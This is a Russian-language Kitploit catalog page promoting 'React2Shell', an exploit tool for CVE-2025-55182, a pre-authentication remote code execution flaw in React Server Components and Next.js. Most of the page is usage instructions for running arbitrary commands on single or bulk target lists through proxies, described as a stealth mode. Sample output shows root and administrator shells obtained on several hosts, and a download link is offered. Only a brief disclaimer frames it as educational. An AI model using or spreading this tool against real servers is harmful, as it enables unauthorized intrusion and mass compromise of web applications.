Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
React2Shell — CVE-2025-55182-advanced-scanner | Kitploit
Инструменты/GitHubGitHub/ankitspandey07/react2shell
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
GitHubankitspandey07/react2shell

React2Shell

CVE-2025-55182-advanced-scanner

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

#React2Hell — Эксплойт CVE-2025-55182

🔥 Эксплойт удалённого выполнения кода (RCE) для Next.js / React Server

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
 Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — Утилита для тестирования безопасности  🚀

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 Обзор

React2Hell — это мощный инструмент эксплуатации, предназначенный для тестирования и эксплуатации CVE-2025-55182, критической уязвимости удалённого выполнения кода, затрагивающей Next.js и React Server Actions.

Уязвимость предварительной аутентификации удалённого выполнения кода существует в React Server Components версий 19.0.0, 19.1.0, 19.1.1 и 19.2.0, включая следующие пакеты: react-server-dom-parcel, react-server-dom-turbopack и react-server-dom-webpack. Уязвимый код небезопасно десериализует полезные данные из HTTP-запросов к конечным точкам Server Function.


✨ Возможности

  • 🧨 Удалённое выполнение кода (RCE)
  • 🌐 Сканирование одного URL / массовое сканирование URL
  • 🧩 Выполнение пользовательских команд
Скачать инструмент
  • 🕵️‍♂️ Скрытый режим с поддержкой прокси
  • ⚡ Быстро, надёжно и просто в использовании

  • 📌 Использование

    Режим одиночной цели

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami"
    

    Несколько целей (из файла)

    root@kitploit:~
    python Scanner.py -l urls.txt -c "whoami"
    

    С HTTP-прокси (Burp Suite)

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
    

    С HTTPS-прокси

    root@kitploit:~
    python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
    

    📁 Пример urls.txt

    root@kitploit:~
    http://site1.com
    https://site2.com
    http://192.168.1.10:3000
    

    🖥️ Пример вывода

    root@kitploit:~
    PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami
    
    
    █████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
    ██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
    ██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                    
    {MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
     Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
        🚀  React2Shell — Security Testing Utility  🚀
    
    ════════════════════════════════════════════════════════════════════════
    [+] Loaded 3 targets
    ════════════════════════════════════════════════════════════════════════
    
    [→] Target: http://evil.com:3113/
    [→] Exec:   whoami
    [✓] VULNERABLE — RCE Successful!
    ------------------------------------------------------------
    root
    ------------------------------------------------------------
    ────────────────────────────────────────────────────────────────────────
    
    [→] Target: http://example.lab:2000/
    [→] Exec:   whoami
    [✗] Not vulnerable — Status: 200
    ────────────────────────────────────────────────────────────────────────
    
    [→] Target: https://tale.lab:3000/
    [→] Exec:   whoami
    [✓] VULNERABLE — RCE Successful!
    ------------------------------------------------------------
    win-1fl835ovldc\\administrator
    ------------------------------------------------------------
    ────────────────────────────────────────────────────────────────────────
    [✓] Scan complete — Vulnerable: 2
    PS D:\Ankitspandey07\React2Hell>
    

    ⚠️ Отказ от ответственности

    Этот инструмент создан строго для образовательных целей и исследований в области безопасности. Не используйте его в системах без явного разрешения. Вы несёте ответственность за свои действия.


    ⭐ Поддержите проект

    Если этот эксплойт помог вам, подумайте о том, чтобы оставить ⭐ на GitHub ❤️


    👤 Автор

    Ankit Pandey; GitHub: https://github.com/Ankitspandey07

    Создано с 🔥 кем-то, кто гордится и увлечён пентестом, кто стремится учиться на каждом шагу.